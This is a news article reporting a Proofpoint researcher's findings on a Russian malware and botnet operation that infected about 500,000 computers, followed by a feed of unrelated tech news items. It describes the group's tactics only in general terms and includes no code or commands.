Skip to main content

Inside a Russian malware scheme that hijacked 500,000 computers

Inside a Russian malware scheme that hijacked 500,000 computers


The group stayed under the radar and ahead of antivirus scans

Share this story

At its peak, the malware ring had control of half a million computers, using keystroke logging to harvest banking passwords and then putting the computers to work in a botnet. By growing slowly and staying one step ahead of anti-virus software, the group was able to go undetected for years — until a lapse in its own security allowed a Proofpoint security researcher named Wayne Huang to get a look at the organization from the inside.

Huang released a report on his findings this morning, providing a rare look at the full anatomy of a malware operation, from the first security break to the fraud tactics that provide them a payoff. It's not a particularly novel or sophisticated scheme — by botnet standards, half a million is the lower end of the big leagues — but it provides a new window into the intricate tactics these groups use to stay hidden. And for anyone who's seen strange behavior from a website or console, it's a reminder that real infections are often harder to find than you think. "They rarely do mass injections. They don't do huge campaigns, so they're not on people's radar," Huang says. "But once they're in, they build a really powerful backdoor."

Proofpoint attack chain
The attack chain, as described by Huang

The scammers' first step was buying passwords on the dark web, paying for data from an earlier breach. That gave them a foothold in the first batch of sites, where the group could install its custom shell, giving them superadmin access to anything on the site, while allowing the site's owners to update the site as usual. When the system worked, the site owners never knew the difference. They still had admin access, and there was no obvious sign that another more powerful admin had been added. While the site owners kept posting as usual, the attackers would use the new backdoor to infect the site’s readers, injecting bursts of malware into the site’s code. From there the attackers would monitor keystrokes for bank login information, to be used in outright fraud, and sell access to their network of hijacked computers for anyone who wanted to disguise their web traffic by routing through a stranger’s internet connection.

The group was always one step ahead of antivirus updates

Most of the infected sites were running regular antivirus scans, but the attackers were careful only to use exploits that wouldn't set off any alarms. Before they uploaded any code, they would check it against the Scan4U database, which collects data from dozens of antivirus companies. If the database recognized the group's exploit, they would change the code until it slipped past unnoticed, ensuring they were always one step ahead of antivirus updates.

They also took measures to throw researchers like Huang off the trail. If a site visitor looked like an automated malware scanner, a traffic distribution system would isolate the visitor and route them to a clean version of the site, suggesting nothing was amiss. The system also kept a list of IP addresses used by security-research firms, and made sure any traffic from those addresses also went to the clean site. As a result, many site owners confronted by Huang refused to believe they were infected at all. The antivirus scan would come back empty, and most independent researchers would see a completely clean site.

But while the hacker's security protections were good, they weren't perfect. Huang's breakthrough came when he found the web address for the attackers' control panel. They hadn't thought to password-protect the controls, so once Huang located it, he got an inside view of everything the group was doing, including the counter-measures they'd used to throw other researchers off the trail. Eventually, the group added a password to keep Huang out, but by then it was too late.

Proofpoint Control Panel
A screenshot of the attacker's control panel.

Once the attackers began targeting individual users, they relied heavily on pre-purchased exploit kits, starting with the popular Blackhole kit and moving on to more recent kits like Sweet Orange and Phoenix. They used an array of vulnerabilities — targeting PDF plugins, Java, Flash and Internet Explorer depending on a user’s unique vulnerabilities — but the group left almost all of that work to others, buying exploits as they became available and abandoning them as patches became more common.

"We get a lot of upset website admins."

Still, even with all of Huang's detail on the group, it's unlikely they'll be brought to justice any time soon. There’s still plenty of work left to do in tracing the network back to individual people, and it’s unclear who’ll want to step in and do it. Taking down a botnet is a notoriously long and drawn-out process, and while Russian law enforcement has made some major busts in recent years, it may not be impressed by an outfit this size. The most Huang can hope for is a little more cred the next time he tells a site that he's found an infection. "We get a lot of upset website admins who believe we’ve falsely accused them of an infection," Huang says. "So we’re certainly hoping that those people will read this report"

More broadly, it’s a sign of how far web security still has to go. Researchers pay a lot of attention to breaches like Heartbleed, which give attackers an initial foothold, and vulnerabilities in popular software, which let them exploit individual users. But lingering infections like this one are often overlooked. As a result, once an attacker builds a backdoor into a server or a site, it can take years for the proper owners to regain control. For the half a million computers detailed in the report, that’s a troubling thought.

Today’s Storystream

Feed refreshed Two hours ago Midjourneys

External Link
Emma RothTwo hours ago
Celsius’ CEO is out.

Alex Mashinsky, the head of the bankrupt crypto lending firm Celsius, announced his resignation today, but not after patting himself on the back for working “tirelessly to help the company.”

In Mashinsky’s eyes, I guess that means designing “Unbankrupt yourself” t-shirts on Cafepress and then selling them to a user base that just had their funds vaporized.

At least customers of the embattled Voyager Digital crypto firm are in slightly better shape, as the Sam Bankman-Fried-owned FTX just bought out the company’s assets.

Mary Beth GriggsTwo hours ago
NASA’s SLS rocket is secure as Hurricane Ian barrels towards Florida.

The rocket — and the Orion spacecraft on top — are now back inside the massive Vehicle Assembly Building. Facing menacing forecasts, NASA decided to roll it away from the launchpad yesterday.

External Link
Andrew J. Hawkins1:30 PM UTC
Harley-Davidson’s electric motorcycle brand is about to go public via SPAC

LiveWire has completed its merger with a blank-check company and will make its debut on the New York Stock Exchange today. Harley-Davison CEO Jochen Zeitz called it “a proud and exciting milestone for LiveWire towards its ambition to become the most desirable electric motorcycle brand in the world.” Hopefully it also manages to avoid the cash crunch of other EV SPACs, like Canoo, Arrival, Faraday Future, and Lordstown.

The Verge
Andrew Webster1:06 PM UTC
“There’s an endless array of drama going on surrounding Twitch right now.”

That’s Ryan Morrison, CEO of Evolved Talent Agency, which represents some of the biggest streamers around. And he’s right — as you can read in this investigation from my colleague Ash Parrish, who looked into just what’s going on with Amazon’s livestreaming service.

The Verge
Richard Lawler12:59 PM UTC
Green light.

NASA’s spacecraft crashed, and everyone is very happy about it.

Otherwise, Mitchell Clark is kicking off the day with a deeper look at Dish Network’s definitely-real 5G wireless service , and Walmart’s metaverse vision in Roblox is not looking good at all.

External Link
Jess Weatherbed11:49 AM UTC
Won’t anyone think of the billionaires?

Forbes reports that rising inflation and falling stock prices have collectively cost members of the Forbes 400 US rich list $500 billion in 2022 with tech tycoons suffering the biggest losses.

Jeff Bezos (worth $151 billion) lost $50 billion, Google’s Larry Page and Sergey Brin (worth a collective $182b) lost almost $60b, Mark Zuckerberg (worth $57.7b) lost $76.8b, and Twitter co-founder Jack Dorsey (worth $4.5b) lost $10.4b. Former Microsoft CEO Steve Ballmer (worth $83b) lost $13.5b while his ex-boss Bill Gates (worth $106b) lost $28b, albeit $20b of that via charity donations.

Thomas Ricker6:45 AM UTC
Check out this delightful DART Easter egg.

Just Google for “NASA DART.” You’re welcome.

Richard Lawler12:00 AM UTC
A direct strike at 14,000 mph.

The Double Asteroid Redirection Test (DART) scored a hit on the asteroid Dimorphos, but as Mary Beth Griggs explains, the real science work is just beginning.

Now planetary scientists will wait to see how the impact changed the asteroid’s orbit, and to download pictures from DART’s LICIACube satellite which had a front-row seat to the crash.

The Verge
We’re about an hour away from a space crash.

At 7:14PM ET, a NASA spacecraft is going to smash into an asteroid! Coverage of the collision — called the Double Asteroid Redirection Test — is now live.

Emma RothSep 26
There’s a surprise in the sky tonight.

Jupiter will be about 367 million miles away from Earth this evening. While that may seem like a long way, it’s the closest it’s been to our home planet since 1963.

During this time, Jupiter will be visible to the naked eye (but binoculars can help). You can check where and when you can get a glimpse of the gas giant from this website.